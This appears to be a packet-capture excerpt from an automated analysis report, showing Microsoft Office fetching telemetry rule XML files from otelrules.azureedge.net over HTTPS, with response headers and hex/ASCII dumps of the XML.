2024-11-07 06:33:14 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:14 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDC681E17" x-ms-request-id: f340cbf4-b01e-0002-12fa-2e1b8f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063314Z-17df447cdb5rrj6shC1DFW6qg400000003t000000000gyau x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:14 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
87	192.168.2.4	49825	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:14 UTC	192	OUT	GET /rules/rule700201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:15 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:14 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT ETag: "0x8DC582BE39DFC9B" x-ms-request-id: 89e70e23-001e-0014-478e-2d5151000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063314Z-15869dbbcc6tjwwhhC1DFWn228000000011000000000ape6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:15 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.4	49826	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:15 UTC	192	OUT	GET /rules/rule700200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:15 UTC	515	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:15 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF66E42D" x-ms-request-id: 45f39ff0-c01e-00a2-2d5f-2e2327000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063315Z-15869dbbcc6b69h9hC1DFWaf7800000002m000000000b6p4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 06:33:15 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.2.4	49828	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:15 UTC	192	OUT	GET /rules/rule702350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:15 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:15 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT ETag: "0x8DC582BE6431446" x-ms-request-id: 4644762d-401e-0016-6540-2e53e0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063315Z-15869dbbcc6kg5mvhC1DFW74ts00000001bg0000000052vg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:15 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.2.4	49827	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:15 UTC	192	OUT	GET /rules/rule702351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:15 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:15 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE017CAD3" x-ms-request-id: 582aff08-701e-0098-0ae0-2e395f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063315Z-17df447cdb5vp9l9hC1DFW0nrw00000004600000000054qe x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:15 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.4	49829	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:15 UTC	192	OUT	GET /rules/rule701251v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:15 UTC	538	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:15 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT ETag: "0x8DC582BDE12A98D" x-ms-request-id: 43524f19-601e-003e-07d2-2c3248000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063315Z-16547b76f7f4k79zhC1DFWu9y000000007w0000000003f2x x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:15 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.2.4	49830	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:15 UTC	192	OUT	GET /rules/rule701250v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:15 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:15 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE022ECC5" x-ms-request-id: a01aecef-901e-005b-2d5f-2e2005000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063315Z-15869dbbcc6rmhmhhC1DFWd7b8000000089000000000b3pp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:15 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
93	192.168.2.4	49831	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:15 UTC	192	OUT	GET /rules/rule700051v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:16 UTC	538	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:15 GMT Content-Type: text/xml Content-Length: 1389 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE10A6BC1" x-ms-request-id: 8f98044c-301e-006e-14bd-2cf018000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063315Z-16547b76f7fnm7lfhC1DFWkxt400000007qg0000000077xn x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:16 UTC	1389	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="

Session ID	Source IP	Source Port	Destination IP	Destination Port
94	192.168.2.4	49835	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:16 UTC	192	OUT	GET /rules/rule702950v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:16 UTC	515	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:16 GMT Content-Type: text/xml Content-Length: 1368 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDDC22447" x-ms-request-id: 7b54aac3-c01e-008d-0d5f-2e2eec000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063316Z-15869dbbcc6j87jfhC1DFWky3s00000008wg00000000a1vw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 06:33:16 UTC	1368	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=

Session ID	Source IP	Source Port	Destination IP	Destination Port
95	192.168.2.4	49834	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:16 UTC	192	OUT	GET /rules/rule700050v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:16 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:16 GMT Content-Type: text/xml Content-Length: 1352 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT ETag: "0x8DC582BE9DEEE28" x-ms-request-id: 00707b2d-601e-0032-7755-2eeebb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063316Z-15869dbbcc6m5ms4hC1DFWx02800000008q000000000f40q x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:16 UTC	1352	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T

Session ID	Source IP	Source Port	Destination IP	Destination Port
96	192.168.2.4	49836	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:16 UTC	192	OUT	GET /rules/rule701151v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:16 UTC	515	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:16 GMT Content-Type: text/xml Content-Length: 1401 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE055B528" x-ms-request-id: d4890277-d01e-00ad-3c4b-2ee942000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063316Z-15869dbbcc662ldwhC1DFWbd5g0000000190000000004stz x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:16 UTC	1401	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA

Session ID	Source IP	Source Port	Destination IP	Destination Port
97	192.168.2.4	49837	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:17 UTC	192	OUT	GET /rules/rule701150v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:17 UTC	538	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:17 GMT Content-Type: text/xml Content-Length: 1364 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE1223606" x-ms-request-id: 98909b4d-d01e-002b-39d2-2c25fb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063317Z-16547b76f7f67wxlhC1DFWah9w00000007p000000000g7kk x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:17 UTC	1364	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 